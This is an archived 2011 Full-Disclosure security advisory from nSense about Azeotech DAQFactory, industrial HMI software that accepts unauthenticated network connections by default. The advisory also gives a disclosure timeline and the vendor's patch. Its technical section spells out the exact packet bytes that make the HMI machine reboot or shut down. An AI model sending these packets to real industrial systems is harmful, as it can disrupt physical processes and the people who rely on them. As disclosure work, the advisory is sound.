lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Wed, 12 Oct 2011 19:27:41 +0300
From: Henri Lindberg <henri+fulldisclosure@...nse.fi>
To: full-disclosure@...ts.grok.org.uk
Subject: nSense-2011-004: Azeotech DAQFactory

      nSense Vulnerability Research Security Advisory NSENSE-2011-004
      ---------------------------------------------------------------

      Affected Vendor:    Azeotech
      Affected Product:   DAQFactory
      Platform:           Windows
      Impact:             Remote reboot/shutdown
      Vendor response:    Patch
      CVE:                None
      Credit:             Knud / nSense

      Technical details
      ---------------------------------------------------------------
      The default configuration allows network connections towards
      the HMI without authentication. This allows an attacker on the
      network to shut down the machine running the HMI software by
      sending a packet as outlined below:
      preamble:
      "\x01\x00\x09\x00CPassword\x00"
      reboot:
      "\x01\x00\x0f\x00CCommandGeneric\x01\x00\x00\x00\x04\x00\x00\x00"
      shutdown:
      "\x01\x00\x0f\x00CCommandGeneric\x01\x00\x00\x00\x06\x00\x00\x00"

      Timeline:
      20110412     Contacted ICS-CERT
      20110413     ICS-CERT acknowledges receipt of information
      20110413     ICS-CERT creates ticket,# ICS-VU-240775
      20110502     Vendor creates patch, releases advisory to customers
      20110625     ICS-CERT releases advisory
      20110727     Vendor responds, CVE assigned, patch 20110809

      Solution
      Install the latest version from the vendor:
      http://www.azeotech.com/downloads.php

      Links:
      http://www.nsense.fi                       http://www.nsense.dk



      $$s$$$$s.   ,s$$$$s   ,S$$$$$s.  $$s$$$$s.   ,s$$$$s   ,S$$$$$s.
      $$$  `$$$  ($$(       $$$  `$$$  $$$  `$$$  ($$(       $$$  `$$$
      $$$   $$$    `^$$s.   $$$$$$$$$  $$$   $$$    `^$$s.   $$$$$$$$$
      $$$   $$$       )$$)  $$$        $$$   $$$       )$$)  $$$
      $$$   $$$  ^$$$$$$7    `7$$$$$P  $$$   $$$  ^$$$$$$7   `7$$$$$P

                     D r i v e n   b y   t h e   c h a l l e n g e _

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ